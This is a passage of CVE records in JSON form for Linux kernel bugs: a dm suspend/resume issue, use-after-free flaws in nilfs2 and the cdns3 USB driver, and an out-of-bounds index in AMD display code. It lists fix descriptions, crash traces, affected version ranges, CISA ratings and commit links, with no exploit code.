0033:0xf7e6aead\n\u003csnip\u003e\n---[ end trace 0000000000000000 ]---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:44.410Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/69836d9329f0b4c58faaf3d886a7748ddb5bf718"
},
{
"url": "https://git.kernel.org/stable/c/da7ece2197101b1469853e6b5e915be1e3896d52"
},
{
"url": "https://git.kernel.org/stable/c/f89bd27709376d37ff883067193320c58a8c1d5a"
},
{
"url": "https://git.kernel.org/stable/c/03ad5ad53e51abf3a4c7538c1bc67a5982b41dc5"
},
{
"url": "https://git.kernel.org/stable/c/ad10289f68f45649816cc68eb93f45fd5ec48a15"
},
{
"url": "https://git.kernel.org/stable/c/15a3fc5c8774c17589dabfe1d642d40685c985af"
},
{
"url": "https://git.kernel.org/stable/c/ef02d8edf738557af2865c5bfb66a03c4e071be7"
},
{
"url": "https://git.kernel.org/stable/c/360a7d1be8112654f1fb328ed3862be630bca3f4"
},
{
"url": "https://git.kernel.org/stable/c/65e8fbde64520001abf1c8d0e573561b4746ef38"
}
],
"title": "dm: call the resume method on internal suspend",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26880",
"datePublished": "2024-04-17T10:27:37.110Z",
"dateReserved": "2024-02-19T14:20:24.185Z",
"dateUpdated": "2025-05-04T08:58:44.410Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38583 (GCVE-0-2024-38583)
Vulnerability from cvelistv5
Published
2024-06-19 13:37
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix use-after-free of timer for log writer thread
Patch series "nilfs2: fix log writer related issues".
This bug fix series covers three nilfs2 log writer-related issues,
including a timer use-after-free issue and potential deadlock issue on
unmount, and a potential freeze issue in event synchronization found
during their analysis. Details are described in each commit log.
This patch (of 3):
A use-after-free issue has been reported regarding the timer sc_timer on
the nilfs_sc_info structure.
The problem is that even though it is used to wake up a sleeping log
writer thread, sc_timer is not shut down until the nilfs_sc_info structure
is about to be freed, and is used regardless of the thread's lifetime.
Fix this issue by limiting the use of sc_timer only while the log writer
thread is alive.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 Version: fdce895ea5dd4e24edf1f4d693827349a4e5b3b4 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:36.675Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/822ae5a8eac30478578a75f7e064f0584931bf2d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/82933c84f188dcfe89eb26b0b48ab5d1ca99d164"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67fa90d4a2ccd9ebb0e1e168c7d0b5d0cf3c7148"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e65ccf3a4de4f0c763d94789615b83e11f204438"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/86a30d6302deddb9fb97ba6fc4b04d0e870b582a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f9186bba4ea282b07293c1c892441df3a5441cb0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f12b2c03c5dae1a0de0a9e5853177e3d6eee3c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68e738be5c518fc3c4e9146b66f67c8fee0135fb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f5d4e04634c9cf68bdf23de08ada0bb92e8befe7"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38583",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:13:56.689885Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:55.339Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/segment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "822ae5a8eac30478578a75f7e064f0584931bf2d",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "82933c84f188dcfe89eb26b0b48ab5d1ca99d164",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "67fa90d4a2ccd9ebb0e1e168c7d0b5d0cf3c7148",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "e65ccf3a4de4f0c763d94789615b83e11f204438",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "86a30d6302deddb9fb97ba6fc4b04d0e870b582a",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "f9186bba4ea282b07293c1c892441df3a5441cb0",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "2f12b2c03c5dae1a0de0a9e5853177e3d6eee3c6",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "68e738be5c518fc3c4e9146b66f67c8fee0135fb",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
},
{
"lessThan": "f5d4e04634c9cf68bdf23de08ada0bb92e8befe7",
"status": "affected",
"version": "fdce895ea5dd4e24edf1f4d693827349a4e5b3b4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/segment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.94",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.94",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix use-after-free of timer for log writer thread\n\nPatch series \"nilfs2: fix log writer related issues\".\n\nThis bug fix series covers three nilfs2 log writer-related issues,\nincluding a timer use-after-free issue and potential deadlock issue on\nunmount, and a potential freeze issue in event synchronization found\nduring their analysis. Details are described in each commit log.\n\n\nThis patch (of 3):\n\nA use-after-free issue has been reported regarding the timer sc_timer on\nthe nilfs_sc_info structure.\n\nThe problem is that even though it is used to wake up a sleeping log\nwriter thread, sc_timer is not shut down until the nilfs_sc_info structure\nis about to be freed, and is used regardless of the thread\u0027s lifetime.\n\nFix this issue by limiting the use of sc_timer only while the log writer\nthread is alive."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:14:37.960Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/822ae5a8eac30478578a75f7e064f0584931bf2d"
},
{
"url": "https://git.kernel.org/stable/c/82933c84f188dcfe89eb26b0b48ab5d1ca99d164"
},
{
"url": "https://git.kernel.org/stable/c/67fa90d4a2ccd9ebb0e1e168c7d0b5d0cf3c7148"
},
{
"url": "https://git.kernel.org/stable/c/e65ccf3a4de4f0c763d94789615b83e11f204438"
},
{
"url": "https://git.kernel.org/stable/c/86a30d6302deddb9fb97ba6fc4b04d0e870b582a"
},
{
"url": "https://git.kernel.org/stable/c/f9186bba4ea282b07293c1c892441df3a5441cb0"
},
{
"url": "https://git.kernel.org/stable/c/2f12b2c03c5dae1a0de0a9e5853177e3d6eee3c6"
},
{
"url": "https://git.kernel.org/stable/c/68e738be5c518fc3c4e9146b66f67c8fee0135fb"
},
{
"url": "https://git.kernel.org/stable/c/f5d4e04634c9cf68bdf23de08ada0bb92e8befe7"
}
],
"title": "nilfs2: fix use-after-free of timer for log writer thread",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38583",
"datePublished": "2024-06-19T13:37:39.858Z",
"dateReserved": "2024-06-18T19:36:34.928Z",
"dateUpdated": "2025-11-04T17:21:36.675Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26749 (GCVE-0-2024-26749)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: cdns3: fixed memory use after free at cdns3_gadget_ep_disable()
...
cdns3_gadget_ep_free_request(&priv_ep->endpoint, &priv_req->request);
list_del_init(&priv_req->list);
...
'priv_req' actually free at cdns3_gadget_ep_free_request(). But
list_del_init() use priv_req->list after it.
[ 1542.642868][ T534] BUG: KFENCE: use-after-free read in __list_del_entry_valid+0x10/0xd4
[ 1542.642868][ T534]
[ 1542.653162][ T534] Use-after-free read at 0x000000009ed0ba99 (in kfence-#3):
[ 1542.660311][ T534] __list_del_entry_valid+0x10/0xd4
[ 1542.665375][ T534] cdns3_gadget_ep_disable+0x1f8/0x388 [cdns3]
[ 1542.671571][ T534] usb_ep_disable+0x44/0xe4
[ 1542.675948][ T534] ffs_func_eps_disable+0x64/0xc8
[ 1542.680839][ T534] ffs_func_set_alt+0x74/0x368
[ 1542.685478][ T534] ffs_func_disable+0x18/0x28
Move list_del_init() before cdns3_gadget_ep_free_request() to resolve this
problem.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.248Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfa9abb5570c489dabf6f7fb3a066cc576fc8824"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b40328eea93c75a5645891408010141a0159f643"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e5c73b15d95452c1ba9c771dd013a3fbe052ff3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2134e9906e17b1e5284300fab547869ebacfd7d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29e42e1578a10c611b3f1a38f3229b2d664b5d16"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a07244f614bc417de527b799da779dcae780b5d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd45f99034b0c8c9cb346dd0d6407a95ca3d36f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26749",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:51:44.326857Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:16.869Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/cdns3/cdns3-gadget.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cfa9abb5570c489dabf6f7fb3a066cc576fc8824",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "b40328eea93c75a5645891408010141a0159f643",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "4e5c73b15d95452c1ba9c771dd013a3fbe052ff3",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "2134e9906e17b1e5284300fab547869ebacfd7d9",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "29e42e1578a10c611b3f1a38f3229b2d664b5d16",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "9a07244f614bc417de527b799da779dcae780b5d",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "cd45f99034b0c8c9cb346dd0d6407a95ca3d36f6",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/cdns3/cdns3-gadget.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: cdns3: fixed memory use after free at cdns3_gadget_ep_disable()\n\n ...\n cdns3_gadget_ep_free_request(\u0026priv_ep-\u003eendpoint, \u0026priv_req-\u003erequest);\n list_del_init(\u0026priv_req-\u003elist);\n ...\n\n\u0027priv_req\u0027 actually free at cdns3_gadget_ep_free_request(). But\nlist_del_init() use priv_req-\u003elist after it.\n\n[ 1542.642868][ T534] BUG: KFENCE: use-after-free read in __list_del_entry_valid+0x10/0xd4\n[ 1542.642868][ T534]\n[ 1542.653162][ T534] Use-after-free read at 0x000000009ed0ba99 (in kfence-#3):\n[ 1542.660311][ T534] __list_del_entry_valid+0x10/0xd4\n[ 1542.665375][ T534] cdns3_gadget_ep_disable+0x1f8/0x388 [cdns3]\n[ 1542.671571][ T534] usb_ep_disable+0x44/0xe4\n[ 1542.675948][ T534] ffs_func_eps_disable+0x64/0xc8\n[ 1542.680839][ T534] ffs_func_set_alt+0x74/0x368\n[ 1542.685478][ T534] ffs_func_disable+0x18/0x28\n\nMove list_del_init() before cdns3_gadget_ep_free_request() to resolve this\nproblem."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:37.922Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cfa9abb5570c489dabf6f7fb3a066cc576fc8824"
},
{
"url": "https://git.kernel.org/stable/c/b40328eea93c75a5645891408010141a0159f643"
},
{
"url": "https://git.kernel.org/stable/c/4e5c73b15d95452c1ba9c771dd013a3fbe052ff3"
},
{
"url": "https://git.kernel.org/stable/c/2134e9906e17b1e5284300fab547869ebacfd7d9"
},
{
"url": "https://git.kernel.org/stable/c/29e42e1578a10c611b3f1a38f3229b2d664b5d16"
},
{
"url": "https://git.kernel.org/stable/c/9a07244f614bc417de527b799da779dcae780b5d"
},
{
"url": "https://git.kernel.org/stable/c/cd45f99034b0c8c9cb346dd0d6407a95ca3d36f6"
}
],
"title": "usb: cdns3: fixed memory use after free at cdns3_gadget_ep_disable()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26749",
"datePublished": "2024-04-03T17:00:35.762Z",
"dateReserved": "2024-02-19T14:20:24.169Z",
"dateUpdated": "2025-05-04T08:55:37.922Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38552 (GCVE-0-2024-38552)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix potential index out of bounds in color transformation function
Fixes index out of bounds issue in the color transformation function.
The issue could occur when the index 'i' exceeds the number of transfer
function points (TRANSFER_FUNC_POINTS).
The fix adds a check to ensure 'i' is within bounds before accessing the
transfer function points. If 'i' is out of bounds, an error message is
logged and the function returns false to indicate an error.
Reported by smatch:
drivers/gpu/drm/amd/amdgpu/../display/dc/dcn10/dcn10_cm_common.c:405 cm_helper_translate_curve_to_hw_format() error: buffer overflow 'output_tf->tf_pts.red' 1025 <= s32max
drivers/gpu/drm/amd/amdgpu/../display/dc/dcn10/dcn10_cm_common.c:406 cm_helper_translate_curve_to_hw_format() error: buffer overflow 'output_tf->tf_pts.green' 1025 <= s32max
drivers/gpu/drm/amd/amdgpu/../display/dc/dcn10/dcn10_cm_common.c:407 cm_helper_translate_curve_to_hw_format() error: buffer overflow 'output_tf->tf_pts.blue' 1025 <= s32max
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 Version: b629596072e5fa901c84f9e88d845a696ee32942 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:24.332Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/604c506ca43fce52bb882cff9c1fdf2ec3b4029c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e280ab978c81443103d7c61bdd1d8d708cf6ed6d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04bc4d1090c343025d69149ca669a27c5b9c34a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ced9c4e2289a786b8fa684d8893b7045ea53ef7e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98b8a6bfd30d07a19cfacdf82b50f84bf3360869"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e8c8b37ee84b3b19c448d2b8e4c916d2f5b9c86"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/123edbae64f4d21984359b99c6e79fcde31c6123"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7226ddf3311c5e5a7726ad7d4e7b079bb3cfbb29"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/63ae548f1054a0b71678d0349c7dc9628ddd42ca"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38552",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:14:50.788974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:57.332Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "604c506ca43fce52bb882cff9c1fdf2ec3b4029c",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "e280ab978c81443103d7c61bdd1d8d708cf6ed6d",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "04bc4d1090c343025d69149ca669a27c5b9c34a7",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "ced9c4e2289a786b8fa684d8893b7045ea53ef7e",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "98b8a6bfd30d07a19cfacdf82b50f84bf3360869",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "4e8c8b37ee84b3b19c448d2b8e4c916d2f5b9c86",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "123edbae64f4d21984359b99c6e79fcde31c6123",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "7226ddf3311c5e5a7726ad7d4e7b079bb3cfbb29",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
},
{
"lessThan": "63ae548f1054a0b71678d0349c7dc9628ddd42ca",
"status": "affected",
"version": "b629596072e5fa901c84f9e88d845a696ee32942",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
